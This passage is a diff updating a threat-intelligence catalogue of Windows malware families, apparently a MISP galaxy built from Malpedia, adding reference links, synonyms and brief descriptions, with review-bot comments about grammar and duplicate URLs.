@@ -4064,9 +8230,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey", - "https://twitter.com/0xffff0800/status/1062948406266642432", "https://twitter.com/ViriBack/status/1062405363457118210", - "https://krabsonsecurity.com/2019/02/13/analyzing-amadey-a-simple-native-malware/" + "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-decrypt-strings-in-amadey-1-09/", + "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware", + "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", + "https://krabsonsecurity.com/2019/02/13/analyzing-amadey-a-simple-native-malware/", + "https://nao-sec.org/2019/04/Analyzing-amadey.html", + "https://www.anquanke.com/post/id/230116", + "https://twitter.com/0xffff0800/status/1062948406266642432", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672" ], "synonyms": [], "type": [] @@ -4091,7 +8266,7 @@ "value": "AMTsol" }, { - "description": "", + "description": "Anatova is a ransomware family with the goal of ciphering all the files that it can and then requesting payment from the victim. It will also check if network shares are connected and will encrypt the files on these shares too. The code is also prepared to support modular extensions.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.anatova_ransom", 
@@ -4104,24 +8279,51 @@ "uuid": "2a28ad28-8ba5-4b8b-9652-bc0cdd37b2c4", "value": "Anatova Ransomware" }, + { + "description": "Anchor is a sophisticated backdoor served as a module to a subset of TrickBot installations. Operating since August 2018 it is not delivered to everybody, but contrary is delivered only to high-profile targets. Since its C2 communication scheme is very similar to the one implemented in the early TrickBot, multiple experts believe it could be attributed to the same authors.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.anchor", + "https://www.netscout.com/blog/asert/dropping-anchor", + "https://technical.nttsecurity.com/post/102fsp2/trickbot-variant-anchor-dns-communicating-over-dns", + "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf", + "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/", + "https://unit42.paloaltonetworks.com/ryuk-ransomware/", + "https://hello.global.ntt/zh-cn/insights/blog/trickbot-variant-communicating-over-dns", + "https://labs.sentinelone.com/the-deadly-planeswalker-how-the-trickbot-group-united-high-tech-crimeware-apt/", + "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-hidden-anchor-bot-nexus-operations/", + "https://medium.com/walmartglobaltech/anchor-and-lazarus-together-again-24744e516607", + "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/", + 
"https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c38308a1-c89d-4835-b057-744f66ff7ddc", + "value": "Anchor" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.andromeda", - "https://blog.fortinet.com/2014/04/16/a-good-look-at-the-andromeda-botnet", "https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation", "https://blog.avast.com/andromeda-under-the-microscope", - "https://blog.fortinet.com/2014/05/19/new-anti-analysis-tricks-in-andromeda-2-08", "http://blog.morphisec.com/andromeda-tactics-analyzed", "https://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis", "http://resources.infosecinstitute.com/andromeda-bot-analysis/", - "https://blog.fortinet.com/2014/04/23/andromeda-2-7-features", "http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/", "https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features", "https://blogs.technet.microsoft.com/mmpc/2017/12/04/microsoft-teams-up-with-law-enforcement-and-other-partners-to-disrupt-gamarue-andromeda/", "https://www.virusbulletin.com/virusbulletin/2018/02/review-evolution-andromeda-over-years-we-say-goodbye/", + "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf", + "https://www.crowdstrike.com/blog/how-to-remediate-hidden-malware-real-time-response/", "https://eternal-todo.com/blog/andromeda-gamarue-loves-json", "http://resources.infosecinstitute.com/andromeda-bot-analysis-part-two/", "https://byte-atlas.blogspot.ch/2015/04/kf-andromeda-bruteforcing.html" 
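Review bot: The Anchor description sentence `Operating since August 2018 it is not delivered to everybody, but contrary is delivered only to high-profile targets.` is ungrammatical and is rendered verbatim in the MISP UI; suggest `Active since August 2018, it is not pushed to every TrickBot bot but only to selected high-profile targets.`. The attribution claim `multiple experts believe it could be attributed to the same authors` is unsourced in the text even though the refs list includes posts that discuss the TrickBot link (the NTT, Cybereason and SentinelOne pieces), so naming one of them in the description would make the claim checkable. In the Andromeda part of the hunk three Fortinet blog links are dropped; if they are dead, archive URLs preserve the citations better than deletion.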
@@ -4141,15 +8343,59 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.anel", - "https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-adds-updated-tools-to-its-arsenal/" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.andromut", + "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part3/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://documents.trendmicro.com/assets/Tech-Brief-Latest-Spam-Campaigns-from-TA505-Now-Using-New-Malware-Tools-Gelup-and-FlowerPippi.pdf", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://www.proofpoint.com/us/threat-insight/post/ta505-begins-summer-campaigns-new-pet-malware-downloader-andromut-uae-south" + ], + "synonyms": [ + "Gelup" + ], + "type": [] + }, + "uuid": "85673cd4-fb05-4f6d-94ec-71290ae2e422", + "value": "AndroMut" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.anel", + "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", + "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-adds-updated-tools-to-its-arsenal/", + "https://www.secureworks.com/research/threat-profiles/bronze-riverside", + "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-Haruyama.pdf" + ], + "synonyms": [ + "UPPERCUT", + "lena" ], - "synonyms": [], "type": [] }, "uuid": "a180afcc-d42d-4600-b70f-af27aaf851b7", "value": "Anel" }, + { 
+ "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.antefrigus", + "https://github.com/albertzsigovits/malware-notes/blob/master/Antefrigus.md", + "http://id-ransomware.blogspot.com/2019/11/antefrigus-ransomware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "04788457-5b72-4a66-8f2c-73497919ece2", + "value": "AnteFrigus Ransomware" + }, { "description": "", "meta": { @@ -4164,6 +8410,21 @@ "uuid": "02be7f3a-f3bf-447b-b8b4-c78432b82694", "value": "Antilam" }, + { + "description": "According to Microsoft Security Intelligence, Anubis is an information stealer sold on underground forums since June 2020. The name overlaps with the Android banking malware but is unrelated. It contains code forked from Loki PWS.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.anubis", + "https://twitter.com/MsftSecIntel/status/1298752223321546754" + ], + "synonyms": [ + "Anubis Stealer" + ], + "type": [] + }, + "uuid": "b19c9f63-a18d-47bb-a9fe-1f9cea21bac0", + "value": "Anubis (Windows)" + }, { "description": "", "meta": { 
@@ -4194,7 +8455,47 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ardamax" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.applejeus", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048c", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048b", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048a", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048g", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048f", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048d", + "https://www.vkremez.com/2019/10/lets-learn-dissecting-lazarus-windows.html", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048e", + "https://us-cert.cisa.gov/ncas/alerts/aa21-048a", + "https://twitter.com/VK_Intel/status/1182730637016481793" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2b655949-8a17-46e5-9522-519c6d77c45f", + "value": "AppleJeus (Windows)" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.appleseed", + "https://www.boho.or.kr/filedownload.do?attach_file_seq=2651&attach_file_id=EpF2651.pdf", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.boho.or.kr/filedownload.do?attach_file_seq=2651&attach_file_id=EpF2652.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c7f8e3b8-328d-43c3-9235-9a2f704389b4", + "value": "Appleseed" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ardamax", + "https://medium.com/@MalFuzzer/dissecting-ardamax-keylogger-f33f922d2576", + "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf" ], "synonyms": [], "type": [] 
@@ -4215,13 +8516,26 @@ "uuid": "bf135b0a-3120-42c4-ba58-c80f9ef689bf", "value": "Arefty" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ariabody", + "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/", + "https://securelist.com/naikons-aria/96899/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5fa1c068-8e73-4930-b6fe-8c92c6357df6", + "value": "Aria-body" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.arik_keylogger", - "http://remote-keylogger.net/", - "https://www.invincea.com/2016/09/crimeware-as-a-service-goes-mainstream/" + "http://remote-keylogger.net/" ], "synonyms": [ "Aaron Keylogger" @@ -4236,9 +8550,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.arkei_stealer", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://www.bleepingcomputer.com/news/security/hacker-breaches-syscoin-github-account-and-poisons-official-client/" ], - "synonyms": [], + "synonyms": [ + "ArkeiStealer" + ], "type": [] }, "uuid": "59eff508-7f26-4fd8-b526-5772a9f3d9a6", 
@@ -4259,12 +8576,29 @@ "uuid": "1a4f99cc-c078-41f8-9749-e1dc524fc795", "value": "ARS VBS Loader" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.artfulpie", + "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/", + "https://www.us-cert.gov/ncas/analysis-reports/ar20-045e" + ], + "synonyms": [], + "type": [] + }, + "uuid": "bc0ad216-9b56-489e-858d-68522e1fdfaf", + "value": "ARTFULPIE" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.artra", - "https://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/" + "https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf", + "https://www.freebuf.com/articles/database/192726.html", + "https://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/", + "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english" ], "synonyms": [], "type": [] 
@@ -4318,8 +8652,66 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.athenago", - "http://blog.talosintel.com/2017/02/athena-go.html" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.asruex", + "https://blog.trendmicro.com/trendlabs-security-intelligence/asruex-backdoor-variant-infects-word-documents-and-pdfs-through-old-ms-office-and-adobe-vulnerabilities/", + "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a51595aa-a399-4332-a14d-a378bae609e7", + "value": "Asruex" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.astaroth", + "https://labs.f-secure.com/blog/attack-detection-fundamentals-code-execution-and-persistence-lab-1/", + "https://www.microsoft.com/security/blog/2019/07/08/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/", + "https://www.microsoft.com/security/blog/2020/03/23/latest-astaroth-living-off-the-land-attacks-are-even-more-invisible-but-not-less-observable/", + "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-Soucek-Hornak-DemystifyingBankingTrojansFromLatinAmerica.pdf", + "https://blog.talosintelligence.com/2020/05/astaroth-analysis.html", + "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", + "https://blog.easysol.net/meet-lucifer-international-trojan/", + "https://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/", + "https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html" + ], + "synonyms": [ + "Guildma" + ], + "type": [] + }, + "uuid": "0cdb83dd-106b-458e-8d04-ca864281e06e", + "value": "Astaroth" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat", + 
"https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html", + "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", + "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", + "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://ti.qianxin.com/uploads/2020/09/17/69da886eecc7087e9dac2d3ea4c66ba8.pdf", + "https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/", + "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c94c4f23-20d1-4858-8f94-01a54b213981", + "value": "AsyncRAT" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.athenago" ], "synonyms": [], "type": [] @@ -4358,7 +8750,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmitch", - "https://securelist.com/blog/sas/77918/atmitch-remote-administration-of-atms/" + "https://securelist.com/blog/sas/77918/atmitch-remote-administration-of-atms/", + "https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf", + "https://securelist.com/atm-pos-malware-landscape-2017-2019/96750/" ], "synonyms": [], "type": [] @@ -4371,6 +8765,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmosphere", + "https://www.zdnet.com/article/new-silence-hacking-group-suspected-of-having-ties-to-cyber-security-industry/", "https://www.group-ib.com/resources/threat-research/silence.html" ], "synonyms": [], 
@@ -4385,6 +8780,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmspitter", "https://quoscient.io/reports/QuoINT_INTBRI_New_ATMSpitter.pdf", + "http://www.secureworks.com/research/threat-profiles/gold-kingswood", + "https://www.secureworks.com/research/threat-profiles/gold-kingswood", "https://quoscient.io/reports/QuoINT_INTBRI_ATMSpitter_v2.pdf" ], "synonyms": [], 
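Review bot: The two secureworks entries added to the ATMSpitter refs are the same resource listed twice, once over plain http and once over https; keep only `"https://www.secureworks.com/research/threat-profiles/gold-kingswood",` and drop the `http://www.secureworks.com/...` line so the galaxy does not carry a cleartext duplicate of an https reference. If this file is regenerated from the Malpedia MISP export, as the commit message suggests, the duplicate should also be corrected upstream or deduplicated in the update script, otherwise the next refresh will reintroduce it.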
@@ -4393,6 +8790,25 @@ "uuid": "5a03a6ff-e127-4cd2-aab1-75f1e3ecc187", "value": "ATMSpitter" }, + { + "description": "Attor is a cyberespionage platform used in targeted attacks against diplomatic missions and governmental institutions since at least 2013. Its most interesting features are a complex modular architecture, elaborate network communications, and a unique plugin to fingerprint GSM/GPRS devices.\r\n\r\nAttor\u2019s core lies in its dispatcher, which serves as a management unit for additional plugins which provide all of malware\u2019s key capabilities. This allows the attackers to customize the platform on a per-victim basis. Plugins themselves are heavily synchronized. Network communication is based on Tor, aiming for anonymity and untraceability. \r\n\r\nThe most notable plugin can detect connected GSM/GPRS modems or mobile devices. Attor speaks to them directly using the AT command set, in order to collect sensitive information such as the IMEI, IMSI or MSISDN numbers, possibly identifying both the device and its subscriber. Other plugins provide persistence, an exfiltration channel, C&C communication and several further spying capabilities. 
The plugin responsible for capturing victim's screen targets social networks and blogging platforms, email services, office software, archiving utilities, file sharing and messaging services.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.attor", + "https://www.welivesecurity.com/2019/10/10/eset-discovers-attor-spy-platform", + "https://safe.cnews.ru/news/top/2019-10-11_za_rossijskimi_diplomatami", + "https://threatpost.com/sophisticated-spy-kit-russians-gsm-plugin/149095/", + "https://www.unian.ua/science/10717107-mizhnarodna-it-kompaniya-poperedzhaye-pro-nizku-shpigunskih-atak-na-uryadovi-ta-diplomatichni-ustanovi-shidnoji-yevropi.html", + "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf", + "https://www.welivesecurity.com/2019/10/10/eset-discovers-attor-spy-platform/", + "https://www.zdnet.com/article/new-espionage-malware-found-targeting-russian-speaking-users-in-eastern-europe/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f5f61bc0-aad2-4da3-83db-703ea516c03b", + "value": "Attor" + }, { "description": "", "meta": { 
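Review bot: The Attor refs list the same ESET article twice, `"https://www.welivesecurity.com/2019/10/10/eset-discovers-attor-spy-platform"` and the identical URL with a trailing slash; only one should be kept, presumably the trailing-slash form, and the full report is already covered by the separate ESET_Attor.pdf entry. Since this content appears to come straight from the Malpedia API export, the duplicate is best removed upstream or by a normalisation step in the update script rather than by hand here.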
@@ -4427,15 +8843,46 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora", + "https://twitter.com/malwrhunterteam/status/1001461507513880576", "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/", "https://www.bleepingcomputer.com/ransomware/decryptor/how-to-decrypt-the-aurora-ransomware-with-auroradecrypter/" ], - "synonyms": [], + "synonyms": [ + "OneKeyLocker" + ], "type": [] }, "uuid": "2f899e3e-1a46-43ea-8e68-140603ce943d", "value": "Aurora" }, + { + "description": "Avaddon is a ransomware malware targeting Windows systems often spread via malicious spam. The first known attack where Avaddon ransomware was distributed was in February 2020. Avaddon encrypts files using the extension .avdn and uses a TOR payment site for the ransom payment.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.avaddon", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://twitter.com/Securityinbits/status/1271065316903120902", + "https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "https://awakesecurity.com/blog/threat-hunting-for-avaddon-ransomware/", + "https://www.swascan.com/it/avaddon-ransomware/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://arxiv.org/pdf/2102.04796.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-avaddon-and-new-techniques-emerge-industrial-sector-targeted", + 
"https://www.hornetsecurity.com/en/security-information/avaddon-from-seeking-affiliates-to-in-the-wild-in-2-days/", + "https://twitter.com/dk_samper/status/1348560784285167617", + "https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure", + "https://www.tgsoft.it/files/report/download.asp?id=568531345", + "https://www.bleepingcomputer.com/news/security/another-ransomware-now-uses-ddos-attacks-to-force-victims-to-pay/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8f648193-68ca-40c2-98b2-e5481487463e", + "value": "Avaddon Ransomware" + }, { "description": "", "meta": { @@ -4467,6 +8914,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aveo", + "https://www.secureworks.com/research/threat-profiles/bronze-overbrook", "http://researchcenter.paloaltonetworks.com/2016/08/unit42-aveo-malware-family-targets-japanese-speaking-users/" ], "synonyms": [], 
@@ -4480,10 +8928,31 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria", - "https://blog.yoroi.company/research/the-ave_maria-malware/" + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://www.kaspersky.com/about/press-releases/2019_fin7-hacking-group-targets-more-than-130-companies-after-leaders-arrest", + "https://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique", + "https://blog.team-cymru.com/2019/07/25/unmasking-ave_maria/", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", + "https://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1", + "https://reaqta.com/2019/04/ave_maria-malware-part1/", + "https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/", + "https://mp.weixin.qq.com/s/C09P0al1nhsyyujHRp0FAw", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "http://blog.morphisec.com/threat-alert-ave-maria-infostealer-on-the-rise-with-new-stealthier-delivery", + "https://www.youtube.com/watch?v=T0tdj1WDioM", + "https://blog.yoroi.company/research/the-ave_maria-malware/", + "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html", + "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/", + "https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + "https://mp.weixin.qq.com/s/fsesosMnKIfAi_I9I0wKSA" ], "synonyms": [ - "AVE_MARIA" + "AVE_MARIA", + "AveMariaRAT", + "Warzone RAT", + "avemaria" ], "type": [] }, 
@@ -4520,16 +8989,50 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult", + "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/", + "https://blog.team-cymru.com/2020/02/19/azorult-what-we-see-using-our-own-tools/", + "https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d", + "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", + "https://mariohenkel.medium.com/decrypting-azorult-traffic-for-fun-and-profit-9f28d8638b05", + "https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/", + "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", + "https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html", + "https://www.vmray.com/cyber-security-blog/azorult-delivered-by-guloader-malware-analysis-spotlight/", + "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", + "https://isc.sans.edu/diary/25120", + "https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html", + "https://www.youtube.com/watch?v=EyDiIAt__dI", + "https://fr3d.hk/blog/gazorp-thieving-from-thieves", "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/", - "https://blog.minerva-labs.com/puffstealer-evasion-in-a-cloak-of-multiple-layers", + "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/", "https://malwarebreakdown.com/2017/07/24/the-seamless-campaign-drops-ramnit-follow-up-malware-azorult-stealer-smoke-loader-etc/", - "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan", - "http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html", - 
"https://blog.minerva-labs.com/azorult-now-as-a-signed-google-update", - "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside", + "https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/", + "https://twitter.com/DrStache_/status/1227662001247268864", + "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/", "https://malwarebreakdown.com/2017/11/12/seamless-campaign-delivers-ramnit-via-rig-ek-at-188-225-82-158-follow-up-malware-is-azorult-stealer/", + "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", + "https://research.checkpoint.com/the-emergence-of-the-new-azorult-3-3/", + "https://unit42.paloaltonetworks.com/cybersquatting/", + "https://threatvector.cylance.com/en_us/home/threat-spotlight-analyzing-azorult-infostealer-malware.html", + "https://blog.minerva-labs.com/puffstealer-evasion-in-a-cloak-of-multiple-layers", + "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan", + "https://www.zscaler.com/blogs/research/multistage-freedom-loader-used-spread-azorult-and-nanocore-rat", + "https://securelist.com/azorult-analysis-history/89922/", + "https://ke-la.com/exploring-the-genesis-supply-chain-for-fun-and-profit/", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://www.blueliv.com/blog-news/research/azorult-crydbrox-stops-sells-malware-credential-stealer/", - "https://research.checkpoint.com/the-emergence-of-the-new-azorult-3-3/" + "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672", + "https://www.zscaler.com/blogs/security-research/targeted-attacks-oil-and-gas-supply-chain-industries-middle-east", + 
"https://blog.prevailion.com/2020/02/the-triune-threat-mastermana-returns.html", + "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware", + "https://blogs.blackberry.com/en/2020/04/threat-spotlight-gootkit-banking-trojan", + "https://www.domaintools.com/resources/blog/identifying-network-infrastructure-related-to-a-who-spoofing-campaign", + "http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html", + "https://maxkersten.nl/binary-analysis-course/malware-analysis/azorult-loader-stages/", + "https://blog.minerva-labs.com/azorult-now-as-a-signed-google-update", + "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", + "https://isc.sans.edu/forums/diary/Analysis+of+a+tripleencrypted+AZORult+downloader/25768/", + "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" ], "synonyms": [ "PuffStealer", @@ -4546,10 +9049,10 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.babar", "http://www.spiegel.de/media/media-35683.pdf", - "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analysing-10-year-old-snowball/", + "https://web.archive.org/web/20150218192803/http://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/", "https://drive.google.com/a/cyphort.com/file/d/0B9Mrr-en8FX4dzJqLWhDblhseTA/", - "https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope", - "https://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/" + 